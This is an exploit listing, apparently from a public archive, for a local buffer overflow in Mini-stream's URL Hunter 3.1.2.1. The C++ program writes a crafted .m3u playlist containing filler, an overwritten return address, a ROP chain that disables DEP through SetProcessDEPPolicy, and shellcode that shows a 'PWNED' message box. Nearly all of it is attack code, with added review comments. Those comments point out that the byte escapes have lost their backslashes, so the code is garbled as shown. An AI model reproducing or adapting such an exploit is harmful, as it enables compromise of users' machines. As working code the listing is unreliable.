# Title : URL Hunter Buffer Overflow DEP Bypass
# Published : 2012-06-21
# Author :
/*######################################################################
Exploit Title: URL Hunter buffer overflow DEP Bypass
Author: Ayrbyte
Vendor or Software Link: Mini-stream Software
Link : http://mini-stream.net/url-hunter/
Version: 3.1.2.1
Category: local
Tested on: Windows XP sp 2
Code : c++
Fb : /Ayrbyte
########################################################################
Greetz To :
XerkusR, Kira, 3|_^^1x, WPFr, C-byte, H4mz_JR, Ch0lise7en, R31tuz
Zax Oktav, Andy Oioi, Rizaldy Ahmad, Rezza Aulia Pratama, Cloud Sky,
Zet Dot Exe, Gabby X-Friends, Valcon Trignome
and all CREMY & b-compi family
######################################################################*/
//NOTE: the generated file Ayrbyte.m3u must be located at c://Ayrbyte.m3u
#include <cstdio>
#include <iostream>
using namespace std;
/*
 * Entry point: writes the crafted playlist file this listing describes.
 * Write order of the generated file:
 *   header  - the "http://" prefix
 *   buff    - 17417 repetitions of the filler token
 *   eip     - the single address annotated as a RETN in SHELL32.dll
 *   rop     - the gadget chain annotated as reaching SetProcessDEPPolicy
 *   nop     - 28 repetitions of the NOP token
 *   code    - the payload annotated as calling USER32.MessageBoxA
 * Always returns 0.
 *
 * NOTE(review): the string literals in this listing carry no backslash
 * escape sequences (e.g. "x41"), so as compiled from this page each
 * fputs() emits the literal ASCII text of the token rather than the bytes
 * the per-line comments describe.
 * NOTE(review): the fopen() result is never checked; if the file cannot be
 * created, every fputs()/fclose() below is called with a null FILE*.
 * <iostream> and `using namespace std` are not used in this function.
 */
int main(){
char header[] = "http://"; // playlist entry prefix, written first
char buff[] = "x41"; // filler token, repeated 17417 times below
char eip[] = "x16x10x9cx7c";//#retn |SHELL32.dll  (the overwritten return address, per the author)
char nop[] = "x90"; // NOP token, repeated 28 times ahead of the payload
//call MessageBoxA "PWNED by Ayrbyte...! ^_^"
// Payload as annotated by the author: two register setups, pushes, a CALL
// to USER32.MessageBoxA, then the ASCII text of the message box string.
char code[] =
"xB8x36xC6x0Dx10" //#MOV EAX,100DC636
"xB9xFFxFFxFFx0F" //#MOV ECX,0FFFFFFF
"xBAxFFxFFxFFx0F" //#MOV EDX,0FFFFFFF
"x2BxC1x2BxD1x52" //#SUB EAX,ECX #SUB EDX,ECX #PUSH EDX
"x50x90x90x90x90" //#PUSH EAX #NOP #NOP #NOP #NOP
"x90x50x90x90x90" //#NOP #PUSH EAX #NOP #NOP #NOP
"x90x52x90" //#NOP #PUSH EDX #NOP
"xE8xD5x3ExCAx77" //<---CALL USER32.MessageBoxA
//string "PWNED By Ayrbyte...! ^_^"
"x20x50x57x4Ex45x44x20x42x79x20x41x79"
"x72x62x79x74x65x2Ex2Ex2Ex21x20x5Ex5Fx5E";
//SetProcessDEPPolicy
// Gadget chain as annotated by the author (module names per line); every
// address here is a hard-coded, non-ASLR value for the "Tested on" target
// named in the header comment and is meaningless elsewhere.
char rop[] =
"x41x41x41x41" //filler; per the author, so that the chain lines up with ESP
"x42x02x9Fx7C" //#pop ebx #retn |shell32.dll
"xFFxFFxFFxFF" //<--value that will be placed in EBX
"xD8x85xA4x7C" //#inc ebx #retn |shell32.dll
"xAFxCFxA4x7C" //#pop ebp #retn |shell32.dll
"xA4x22x86x7C" //#<- SetProcessDEPPolicy, into EBP
"xCAx2ExAEx7c" //#pop edi #retn |shell32.dll
"xCBx2ExAEx7C" //#retn |shell32.dll
"xFEx2ExAEx7C" //#pop esi #retn |shell32.dll
"xCBx2ExAEx7C" //#retn |shell32.dll
"x01x4Ex9Ex7C" //#xor eax,eax #retn |shell32.dll
"x1DxC9x91x7C" //#xor ecx,ecx #retn |ntdll.dll
"x8Ex09xF3x77" //#xor edx,edx #retn |gdi32.dll
"x65x82xA5x7C";//#jmp esp |shell32.dll
//Make Exploit File
FILE *teksfile;
teksfile = fopen("c:\Ayrbyte.m3u", "w"); // NOTE(review): "\A" is not a standard escape; result not checked for NULL
fputs(header, teksfile);
for(int i=0; i < 17417; i++){fputs(buff, teksfile);} // presumably the distance to the saved return address -- not verifiable from this page
fputs(eip, teksfile);
fputs(rop, teksfile);
for(int i=0; i < 28; i++){fputs(nop, teksfile);} // NOP run preceding the payload
fputs(code, teksfile);
fclose(teksfile); // flushes and releases the handle; return value also unchecked
return 0;}
/*###############################################################
#we are CREMY ########## ###### ###### ## ##
#we are unity ## ###### ## ## ## ## ## ##
#we love peace ## ###### ## ## ## ## ## ## ##
#we crazy but not lazy ## ## ## ########### #### ## ####
#what about you...? ## ###### ## ## ## ###
#be crazy now...! ## ## ## ###### ## ## ##
################################## ## ## ##
## ## ####################### */